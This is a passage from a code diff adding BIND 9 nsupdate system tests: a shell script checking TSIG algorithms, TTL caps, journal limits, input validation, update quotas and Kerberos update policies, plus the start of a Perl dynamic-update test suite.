${alg}.keytests.nil | grep 10.10.10.3 > /dev/null 2>&1 || ret=1 +done +if [ $ret -ne 0 ]; then + echo_i "failed" + status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check TSIG key algorithms (nsupdate -y) ($n)" +for alg in md5 sha1 sha224 sha256 sha384 sha512; do + secret=$(sed -n 's/.*secret "\(.*\)";.*/\1/p' ns1/${alg}.key) + $NSUPDATE -y "hmac-${alg}:${alg}-key:$secret" <<END > /dev/null || ret=1 +server 10.53.0.1 ${PORT} +update add ${alg}.keytests.nil. 600 A 10.10.10.50 +send +END +done +sleep 2 +for alg in md5 sha1 sha224 sha256 sha384 sha512; do + $DIG $DIGOPTS +short @10.53.0.1 ${alg}.keytests.nil | grep 10.10.10.50 > /dev/null 2>&1 || ret=1 +done +if [ $ret -ne 0 ]; then + echo_i "failed" + status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check that ttl is capped by max-ttl ($n)" +$NSUPDATE <<END > /dev/null || ret=1 +server 10.53.0.1 ${PORT} +update add cap.max-ttl.nil. 600 A 10.10.10.3 +update add nocap.max-ttl.nil. 150 A 10.10.10.3 +send +END +sleep 2 +$DIG $DIGOPTS @10.53.0.1 cap.max-ttl.nil | grep "^cap.max-ttl.nil. 300" > /dev/null 2>&1 || ret=1 +$DIG $DIGOPTS @10.53.0.1 nocap.max-ttl.nil | grep "^nocap.max-ttl.nil. 150" > /dev/null 2>&1 || ret=1 +if [ $ret -ne 0 ]; then + echo_i "failed" + status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "add a record which is truncated when logged. ($n)" +$NSUPDATE verylarge || ret=1 +$DIG $DIGOPTS +tcp @10.53.0.1 txt txt.update.nil > dig.out.ns1.test$n +grep "ANSWER: 1," dig.out.ns1.test$n > /dev/null || ret=1 +grep "adding an RR at 'txt.update.nil' TXT .* \[TRUNCATED\]" ns1/named.run > /dev/null || ret=1 +if [ $ret -ne 0 ]; then + echo_i "failed" + status=1 +fi + +n=$((n + 1)) +ret=0 +echo_i "check that yyyymmddvv serial number is correctly generated ($n)" +oldserial=$($DIG $DIGOPTS +short yyyymmddvv.nil. soa @10.53.0.1 | awk '{print $3}') || ret=1 +$NSUPDATE <<END > /dev/null 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + ttl 600 + update add new.yyyymmddvv.nil in a 1.2.3.4 + send +END +now=$($PERL -e '@lt=localtime(); printf "%.4d%0.2d%0.2d00\n",$lt[5]+1900,$lt[4]+1,$lt[3];') +sleep 1 +serial=$($DIG $DIGOPTS +short yyyymmddvv.nil. soa @10.53.0.1 | awk '{print $3}') || ret=1 +[ "$oldserial" -ne "$serial" ] || ret=1 +[ "$serial" -eq "$now" ] || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +# +# Refactor to use perl to launch the parallel updates. +# +if false +then +n=$((n + 1)) +echo_i "send many simultaneous updates via a update forwarder ($n)" +ret=0 +for i in 0 1 2 3 4 5 6 7 +do +( + for j in 0 1 2 3 4 5 6 7 + do + ( + $NSUPDATE << EOF +server 10.53.0.3 ${PORT} +zone many.test +update add $i-$j.many.test 0 IN A 1.2.3.4 +send +EOF + ) & + done + wait +) & +done +wait +dig axfr many.test @10.53.0.1 > dig.out.test$n +lines=$(awk '$4 == "A" { l++ } END { print l }' dig.out.test$n) +test ${lines:-0} -eq 64 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } +fi + +n=$((n + 1)) +echo_i "check max-journal-size limits ($n)" +ret=0 +rm -f nsupdate.out1-$n +# add one record +$NSUPDATE << EOF >> nsupdate.out1-$n 2>&1 +server 10.53.0.1 ${PORT} +zone maxjournal.test +update add z.maxjournal.test 300 IN A 10.20.30.40 +send +EOF +for i in 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do + # repeatedly add and remove the same set of records to fill up + # the journal file without changing the zone content + $NSUPDATE << EOF >> nsupdate.out1-$n 2>&1 +server 10.53.0.1 ${PORT} +zone maxjournal.test +update add a.maxjournal.test 300 IN A 1.2.3.4 +update add b.maxjournal.test 300 IN A 1.2.3.4 +update add c.maxjournal.test 300 IN A 1.2.3.4 +update add d.maxjournal.test 300 IN A 1.2.3.4 +send +update del a.maxjournal.test +update del b.maxjournal.test +update del c.maxjournal.test +update del d.maxjournal.test +send +EOF +done +# check that the journal is big enough to require truncation. +size=$($PERL -e 'use File::stat; my $sb = stat(@ARGV[0]); printf("%s\n", $sb->size);' ns1/maxjournal.db.jnl) +[ "$size" -gt 6000 ] || ret=1 +sleep 1 +$RNDCCMD 10.53.0.1 sync maxjournal.test +check_size_lt_5000() ( + size=$($PERL -e 'use File::stat; my $sb = stat(@ARGV[0]); printf("%s\n", $sb->size);' ns1/maxjournal.db.jnl) + [ "$size" -lt 5000 ] +) +retry_quiet 20 check_size_lt_5000 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +echo_i "check check-names processing ($n)" +ret=0 +$NSUPDATE << EOF > nsupdate.out1-$n 2>&1 +update add # 0 in a 1.2.3.4 +EOF +grep "bad owner" nsupdate.out1-$n > /dev/null || ret=1 + +$NSUPDATE << EOF > nsupdate.out2-$n 2>&1 +check-names off +update add # 0 in a 1.2.3.4 +EOF +grep "bad owner" nsupdate.out2-$n > /dev/null && ret=1 + +$NSUPDATE << EOF > nsupdate.out3-$n 2>&1 +update add . 0 in mx 0 # +EOF +grep "bad name" nsupdate.out3-$n > /dev/null || ret=1 + +$NSUPDATE << EOF > nsupdate.out4-$n 2>&1 +check-names off +update add . 0 in mx 0 # +EOF +grep "bad name" nsupdate.out4-$n > /dev/null && ret=1 + +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +echo_i "check adding of delegating NS records processing ($n)" +ret=0 +$NSUPDATE -v << EOF > nsupdate.out-$n 2>&1 || ret=1 +server 10.53.0.3 ${PORT} +zone delegation.test. +update add child.delegation.test. 3600 NS foo.example.net. +update add child.delegation.test. 3600 NS bar.example.net. +send +EOF +$DIG $DIGOPTS +tcp @10.53.0.3 ns child.delegation.test > dig.out.ns1.test$n +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1 +grep "AUTHORITY: 2" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +echo_i "check deleting of delegating NS records processing ($n)" +ret=0 +$NSUPDATE -v << EOF > nsupdate.out-$n 2>&1 || ret=1 +server 10.53.0.3 ${PORT} +zone delegation.test. +update del child.delegation.test. 3600 NS foo.example.net. +update del child.delegation.test. 3600 NS bar.example.net. +send +EOF +$DIG $DIGOPTS +tcp @10.53.0.3 ns child.delegation.test > dig.out.ns1.test$n +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +echo_i "check that adding too many records is blocked ($n)" +ret=0 +$NSUPDATE -v << EOF > nsupdate.out-$n 2>&1 && ret=1 +server 10.53.0.3 ${PORT} +zone too-big.test. +update add r1.too-big.test 3600 IN TXT r1.too-big.test +send +EOF +grep "update failed: SERVFAIL" nsupdate.out-$n > /dev/null || ret=1 +$DIG $DIGOPTS +tcp @10.53.0.3 r1.too-big.test TXT > dig.out.ns3.test$n +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +grep "records in zone (4) exceeds max-records (3)" ns3/named.run > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check whether valid addresses are used for primary failover ($n)" +$NSUPDATE -t 1 <<END > nsupdate.out-$n 2>&1 && ret=1 +server 10.53.0.4 ${PORT} +zone unreachable. +update add unreachable. 600 A 192.0.2.1 +send +END +grep "; Communication with 10.53.0.4#${PORT} failed: timed out" nsupdate.out-$n > /dev/null 2>&1 || ret=1 +grep "not implemented" nsupdate.out-$n > /dev/null 2>&1 && ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "ensure bad owner name is fatal in non-interactive mode ($n)" +$NSUPDATE <<END > nsupdate.out 2>&1 && ret=1 + update add emptylabel..nil. 600 A 10.10.10.1 +END +grep "invalid owner name: empty label" nsupdate.out > /dev/null || ret=1 +grep "syntax error" nsupdate.out > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "ensure bad owner name is not fatal in interactive mode ($n)" +$NSUPDATE -i <<END > nsupdate.out 2>&1 || ret=1 + update add emptylabel..nil. 600 A 10.10.10.1 +END +grep "invalid owner name: empty label" nsupdate.out > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "ensure invalid key type is fatal in non-interactive mode ($n)" +$NSUPDATE <<END > nsupdate.out 2>&1 && ret=1 + key badkeytype:example abcd12345678 +END +grep "unknown key type 'badkeytype'" nsupdate.out > /dev/null || ret=1 +grep "syntax error" nsupdate.out > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "ensure invalid key type is not fatal in interactive mode ($n)" +$NSUPDATE -i <<END > nsupdate.out 2>&1 || ret=1 + key badkeytype:example abcd12345678 +END +grep "unknown key type 'badkeytype'" nsupdate.out > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "ensure unresolvable server name is fatal in non-interactive mode ($n)" +$NSUPDATE <<END > nsupdate.out 2>&1 && ret=1 + server unresolvable.. +END +grep "couldn't get address for 'unresolvable..':" nsupdate.out > /dev/null || ret=1 +grep "syntax error" nsupdate.out > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "ensure unresolvable server name is not fatal in interactive mode ($n)" +$NSUPDATE -i <<END > nsupdate.out 2>&1 || ret=1 + server unresolvable.. +END +grep "couldn't get address for 'unresolvable..':" nsupdate.out > /dev/null || ret=1 +grep "syntax error" nsupdate.out > /dev/null && ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check nsupdate -4 -6 ($n)" +$NSUPDATE -4 -6 <<END > nsupdate.out-$n 2>&1 && ret=1 +server 10.53.0.3 ${PORT} +zone delegation.test. +update del child.delegation.test. 3600 NS foo.example.net. +update del child.delegation.test. 3600 NS bar.example.net. +send +END +grep "only one of -4 and -6 allowed" nsupdate.out-$n > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check nsupdate -4 with an IPv6 server address ($n)" +$NSUPDATE -4 <<END > nsupdate.out-$n 2>&1 && ret=1 +server fd92:7065:b8e:ffff::2 ${PORT} +zone delegation.test. +update del child.delegation.test. 3600 NS foo.example.net. +update del child.delegation.test. 3600 NS bar.example.net. +send +END +grep "address family not supported" nsupdate.out-$n > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that TKEY in a update is rejected ($n)" +$NSUPDATE -d <<END > nsupdate.out-$n 2>&1 && ret=1 +server 10.53.0.3 ${PORT} +update add tkey.example 0 in tkey invalid.algorithm. 1516055980 1516140801 1 0 16 gRof8D2BFKvl/vrr9Lmnjw== 16 gRof8D2BFKvl/vrr9Lmnjw== +send +END +grep "UPDATE, status: NOERROR" nsupdate.out-$n > /dev/null 2>&1 || ret=1 +grep "UPDATE, status: FORMERR" nsupdate.out-$n > /dev/null 2>&1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that DS to the zone apex is ignored ($n)" +$DIG $DIGOPTS +tcp +norec example DS @10.53.0.3 > dig.out.pre.test$n || ret=1 +grep "status: NOERROR" dig.out.pre.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.pre.test$n > /dev/null || ret=1 +nextpart ns3/named.run > /dev/null +# specify zone to override the default of adding to parent zone +$NSUPDATE -d <<END > nsupdate.out-$n 2>&1 || ret=1 +server 10.53.0.3 ${PORT} +zone example +update add example 0 in DS 14364 10 2 FD03B2312C8F0FE72C1751EFA1007D743C94EC91594FF0047C23C37CE119BA0C +send +END +msg=": attempt to add a DS record at zone apex ignored" +nextpart ns3/named.run | grep "$msg" > /dev/null || ret=1 +$DIG $DIGOPTS +tcp +norec example DS @10.53.0.3 > dig.out.post.test$n || ret=1 +grep "status: NOERROR" dig.out.post.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.post.test$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that CDS with mismatched algorithm to DNSSEC multisigner zone is not allowed ($n)" +$DIG $DIGOPTS +tcp +norec multisigner.test CDS @10.53.0.3 > dig.out.pre.test$n || ret=1 +grep "status: NOERROR" dig.out.pre.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.pre.test$n > /dev/null || ret=1 +$NSUPDATE -d <<END > nsupdate.out-$n 2>&1 && ret=1 +server 10.53.0.3 ${PORT} +zone multisigner.test +update add multisigner.test 3600 IN CDS 14364 14 2 FD03B2312C8F0FE72C1751EFA1007D743C94EC91594FF0047C23C37CE119BA0C +send +END +msg=": bad CDS RRset" +nextpart ns3/named.run | grep "$msg" > /dev/null || ret=1 +$DIG $DIGOPTS +tcp +norec multisigner.test CDS @10.53.0.3 > dig.out.post.test$n || ret=1 +grep "status: NOERROR" dig.out.post.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.post.test$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that CDNSKEY with mismatched algorithm to DNSSEC multisigner zone is not allowed ($n)" +$DIG $DIGOPTS +tcp +norec multisigner.test CDNSKEY @10.53.0.3 > dig.out.pre.test$n || ret=1 +grep "status: NOERROR" dig.out.pre.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.pre.test$n > /dev/null || ret=1 +nextpart ns3/named.run > /dev/null +$NSUPDATE -d <<END > nsupdate.out-$n 2>&1 && ret=1 +server 10.53.0.3 ${PORT} +zone multisigner.test +update add multisigner.test 3600 IN CDNSKEY 257 3 14 d0NQ5PKmDz6P0B1WPMH9/UKRux/toSFwV2nTJYPA1Cx8pB0sJGTXbVhG U+6gye7VCHDhGIn9CjVfb2RJPW7GnQ== +send +END +msg=": bad CDNSKEY RRset" +nextpart ns3/named.run | grep "$msg" > /dev/null || ret=1 +$DIG $DIGOPTS +tcp +norec multisigner.test CDNSKEY @10.53.0.3 > dig.out.post.test$n || ret=1 +grep "status: NOERROR" dig.out.post.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.post.test$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that CDS to DNSSEC multisigner zone is allowed ($n)" +$DIG $DIGOPTS +tcp +norec multisigner.test CDS @10.53.0.3 > dig.out.pre.test$n || ret=1 +grep "status: NOERROR" dig.out.pre.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.pre.test$n > /dev/null || ret=1 +$NSUPDATE -d <<END > nsupdate.out-$n 2>&1 || ret=1 +server 10.53.0.3 ${PORT} +zone multisigner.test +update add multisigner.test 3600 IN CDS 14364 13 2 FD03B2312C8F0FE72C1751EFA1007D743C94EC91594FF0047C23C37CE119BA0C +send +END +retry_quiet 5 has_positive_response multisigner.test CDS 10.53.0.3 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that CDNSKEY to DNSSEC multisigner zone is allowed ($n)" +$DIG $DIGOPTS +tcp +norec multisigner.test CDNSKEY @10.53.0.3 > dig.out.pre.test$n || ret=1 +grep "status: NOERROR" dig.out.pre.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.pre.test$n > /dev/null || ret=1 +$NSUPDATE -d <<END > nsupdate.out-$n 2>&1 || ret=1 +server 10.53.0.3 ${PORT} +zone multisigner.test +update add multisigner.test 3600 IN CDNSKEY 257 3 13 d0NQ5PKmDz6P0B1WPMH9/UKRux/toSFwV2nTJYPA1Cx8pB0sJGTXbVhG U+6gye7VCHDhGIn9CjVfb2RJPW7GnQ== +send +END +retry_quiet 5 has_positive_response multisigner.test CDNSKEY 10.53.0.3 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that excessive NSEC3PARAM iterations are rejected by nsupdate ($n)" +$NSUPDATE -d <<END > nsupdate.out-$n 2>&1 && ret=1 +server 10.53.0.3 ${PORT} +zone example +update add example 0 in NSEC3PARAM 1 0 151 - +END +grep "NSEC3PARAM has excessive iterations (> 150)" nsupdate.out-$n >/dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +n=$((n + 1)) +ret=0 +echo_i "check that update is rejected if query is not allowed ($n)" +{ + $NSUPDATE -d <<END + local 10.53.0.2 + server 10.53.0.1 ${PORT} + update add reject.other.nil 3600 IN TXT Whatever + send +END +} > nsupdate.out.test$n 2>&1 +grep 'failed: REFUSED' nsupdate.out.test$n > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +# This check is unstable on Windows. +if [ ! "$CYGWIN" ]; then + n=$((n + 1)) + ret=0 + echo_i "check that update is rejected if quota is exceeded ($n)" + for loop in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20; do + { + $NSUPDATE -4 -l -p ${PORT} -k ns1/session.key > /dev/null 2>&1 <<END + update add txt-$loop.other.nil 3600 IN TXT Whatever + send +END + } & + done + wait_for_log 10 "too many DNS UPDATEs queued" ns1/named.run || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } +fi + +if ! $FEATURETEST --gssapi ; then + echo_i "SKIPPED: GSSAPI tests" +else + n=$((n + 1)) + ret=0 + echo_i "check krb5-self match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns7/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 || ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.7 ${PORT} + zone example.com + update add machine.example.com 3600 IN A 10.53.0.7 + send +EOF + $DIG $DIGOPTS +tcp @10.53.0.7 machine.example.com A > dig.out.ns7.test$n + grep "status: NOERROR" dig.out.ns7.test$n > /dev/null || ret=1 + grep "machine.example.com..*A.*10.53.0.7" dig.out.ns7.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check krb5-self no-match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns7/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 && ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.7 ${PORT} + zone example.com + update add foo.example.com 3600 IN A 10.53.0.7 + send +EOF + grep "update failed: REFUSED" nsupdate.out-$n > /dev/null || ret=1 + $DIG $DIGOPTS +tcp @10.53.0.7 foo.example.com A > dig.out.ns7.test$n + grep "status: NXDOMAIN" dig.out.ns7.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check krb5-subdomain match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns7/machine.ccache" + export KRB5CCNAME + $NSUPDATE -d << EOF > nsupdate.out-$n 2>&1 || ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.7 ${PORT} + zone example.com + update add _xxx._tcp.example.com 3600 IN SRV 0 0 0 machine.example.com + send +EOF + $DIG $DIGOPTS +tcp @10.53.0.7 _xxx._tcp.example.com SRV > dig.out.ns7.test$n + grep "status: NOERROR" dig.out.ns7.test$n > /dev/null || ret=1 + grep "_xxx._tcp.example.com.*SRV.*0 0 0 machine.example.com" dig.out.ns7.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check krb5-subdomain no-match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns7/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 && ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.7 ${PORT} + zone example.com + update add _xxx._udp.example.com 3600 IN SRV 0 0 0 machine.example.com + send +EOF + grep "update failed: REFUSED" nsupdate.out-$n > /dev/null || ret=1 + $DIG $DIGOPTS +tcp @10.53.0.7 _xxx._udp.example.com SRV > dig.out.ns7.test$n + grep "status: NXDOMAIN" dig.out.ns7.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n+1)) + ret=0 + echo_i "check krb5-selfsub match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns8/machine.ccache" + export KRB5CCNAME + $NSUPDATE -d << EOF > nsupdate.out-$n 2>&1 || ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.8 ${PORT} + zone example.com + update add xxx.machine.example.com 3600 IN A 10.53.0.8 + send +EOF + $DIG $DIGOPTS +tcp @10.53.0.8 xxx.machine.example.com A > dig.out.ns8.test$n + grep "status: NOERROR" dig.out.ns8.test$n > /dev/null || ret=1 + grep "xxx.machine.example.com..*A.*10.53.0.8" dig.out.ns8.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check krb5-selfsub no-match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns8/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 && ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.8 ${PORT} + zone example.com + update add foo.example.com 3600 IN A 10.53.0.8 + send +EOF + grep "update failed: REFUSED" nsupdate.out-$n > /dev/null || ret=1 + $DIG $DIGOPTS +tcp @10.53.0.8 foo.example.com A > dig.out.ns8.test$n + grep "status: NXDOMAIN" dig.out.ns8.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + + echo_i "check ms-self match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns9/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 || ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.9 ${PORT} + zone example.com + update add machine.example.com 3600 IN A 10.53.0.9 + send +EOF + $DIG $DIGOPTS +tcp @10.53.0.9 machine.example.com A > dig.out.ns9.test$n + grep "status: NOERROR" dig.out.ns9.test$n > /dev/null || ret=1 + grep "machine.example.com..*A.*10.53.0.9" dig.out.ns9.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check ms-self no-match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns9/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 && ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.9 ${PORT} + zone example.com + update add foo.example.com 3600 IN A 10.53.0.9 + send +EOF + grep "update failed: REFUSED" nsupdate.out-$n > /dev/null || ret=1 + $DIG $DIGOPTS +tcp @10.53.0.9 foo.example.com A > dig.out.ns9.test$n + grep "status: NXDOMAIN" dig.out.ns9.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check ms-subdomain match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns9/machine.ccache" + export KRB5CCNAME + $NSUPDATE -d << EOF > nsupdate.out-$n 2>&1 || ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.9 ${PORT} + zone example.com + update add _xxx._tcp.example.com 3600 IN SRV 0 0 0 machine.example.com + send +EOF + $DIG $DIGOPTS +tcp @10.53.0.9 _xxx._tcp.example.com SRV > dig.out.ns9.test$n + grep "status: NOERROR" dig.out.ns9.test$n > /dev/null || ret=1 + grep "_xxx._tcp.example.com.*SRV.*0 0 0 machine.example.com" dig.out.ns9.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check ms-subdomain no-match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns9/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 && ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.9 ${PORT} + zone example.com + update add _xxx._udp.example.com 3600 IN SRV 0 0 0 machine.example.com + send +EOF + grep "update failed: REFUSED" nsupdate.out-$n > /dev/null || ret=1 + $DIG $DIGOPTS +tcp @10.53.0.9 _xxx._udp.example.com SRV > dig.out.ns9.test$n + grep "status: NXDOMAIN" dig.out.ns9.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n+1)) + ret=0 + echo_i "check ms-selfsub match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns10/machine.ccache" + export KRB5CCNAME + $NSUPDATE -d << EOF > nsupdate.out-$n 2>&1 || ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.10 ${PORT} + zone example.com + update add xxx.machine.example.com 3600 IN A 10.53.0.10 + send +EOF + $DIG $DIGOPTS +tcp @10.53.0.10 xxx.machine.example.com A > dig.out.ns10.test$n + grep "status: NOERROR" dig.out.ns10.test$n > /dev/null || ret=1 + grep "xxx.machine.example.com..*A.*10.53.0.10" dig.out.ns10.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + + n=$((n + 1)) + ret=0 + echo_i "check ms-selfsub no-match ($n)" + KRB5CCNAME="FILE:$(pwd)/ns10/machine.ccache" + export KRB5CCNAME + $NSUPDATE << EOF > nsupdate.out-$n 2>&1 && ret=1 + gsstsig + realm EXAMPLE.COM + server 10.53.0.10 ${PORT} + zone example.com + update add foo.example.com 3600 IN A 10.53.0.10 + send +EOF + grep "update failed: REFUSED" nsupdate.out-$n > /dev/null || ret=1 + $DIG $DIGOPTS +tcp @10.53.0.10 foo.example.com A > dig.out.ns10.test$n + grep "status: NXDOMAIN" dig.out.ns10.test$n > /dev/null || ret=1 + [ $ret = 0 ] || { echo_i "failed"; status=1; } + +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/nsupdate/update_test.pl b/bin/tests/system/nsupdate/update_test.pl new file mode 100644 index 0000000..835f1f8 --- /dev/null +++ b/bin/tests/system/nsupdate/update_test.pl @@ -0,0 +1,429 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Dynamic update test suite. +# +# Usage: +# +# perl update_test.pl [-s server] [-p port] zone +# +# The server defaults to 127.0.0.1. +# The port defaults to 53. +# +# The "Special NS rules" tests will only work correctly if the +# zone has no NS records to begin with, or alternatively has a +# single NS record pointing at the name "ns1" (relative to +# the zone name). +# +# Installation notes: +# +# This program uses the Net::DNS::Resolver module. +# You can install it by saying +# +# perl -MCPAN -e "install Net::DNS" +# + +use Getopt::Std; +use Net::DNS; +use Net::DNS::Update; +use Net::DNS::Resolver; + +$opt_s = "127.0.0.1"; +$opt_p = 53; + +getopt('s:p:'); + +$res = new Net::DNS::Resolver; +$res->nameservers($opt_s); +$res->port($opt_p); +$res->defnames(0); # Do not append default domain. + +@ARGV == 1 or die + "usage: perl update_test.pl [-s server] [-p port] zone\n"; + +$zone = shift @ARGV; + +my $failures = 0; + +sub assert { + my ($cond, $explanation) = @_; + if (!$cond) { + print "Test Failed: $explanation ***\n"; + $failures++; + } +} + +sub test { + my ($expected, @records) = @_; + + my $update = new Net::DNS::Update("$zone"); + + foreach $rec (@records) { + $update->push(@$rec); + } + + $reply = $res->send($update); + + # Did it work? + if (defined $reply) { + my $rcode = $reply->header->rcode; + assert($rcode eq $expected, "expected $expected, got $rcode"); + } else { + print "Update failed: ", $res->errorstring, "\n"; + $failures++; + } +} + +sub section { + my ($msg) = @_; + print "$msg\n"; +} + +section("Delete any leftovers from previous tests"); +test("NOERROR", ["update", rr_del("a.$zone")]); +test("NOERROR", ["update", rr_del("b.$zone")]); +test("NOERROR", ["update", rr_del("c.$zone")]); +test("NOERROR", ["update", rr_del("d.$zone")]); +test("NOERROR", ["update", rr_del("e.$zone")]); +test("NOERROR", ["update", rr_del("f.$zone")]); +test("NOERROR", ["update", rr_del("ns.s.$zone")]); +test("NOERROR", ["update", rr_del("s.$zone")]); +test("NOERROR", ["update", rr_del("t.$zone")]); +test("NOERROR", ["update", rr_del("*.$zone")]); +test("NOERROR", ["update", rr_del("u.$zone")]); +test("NOERROR", ["update", rr_del("a.u.$zone")]); +test("NOERROR", ["update", rr_del("b.u.$zone")]); + +section("Simple prerequisites in the absence of data"); +# Name is in Use +test("NXDOMAIN", ["pre", yxdomain("a.$zone")]); +# RRset exists (value independent) +test("NXRRSET", ["pre", yxrrset("a.$zone A")]); +# Name is not in use +test("NOERROR", ["pre", nxdomain("a.$zone")]); +# RRset does not exist 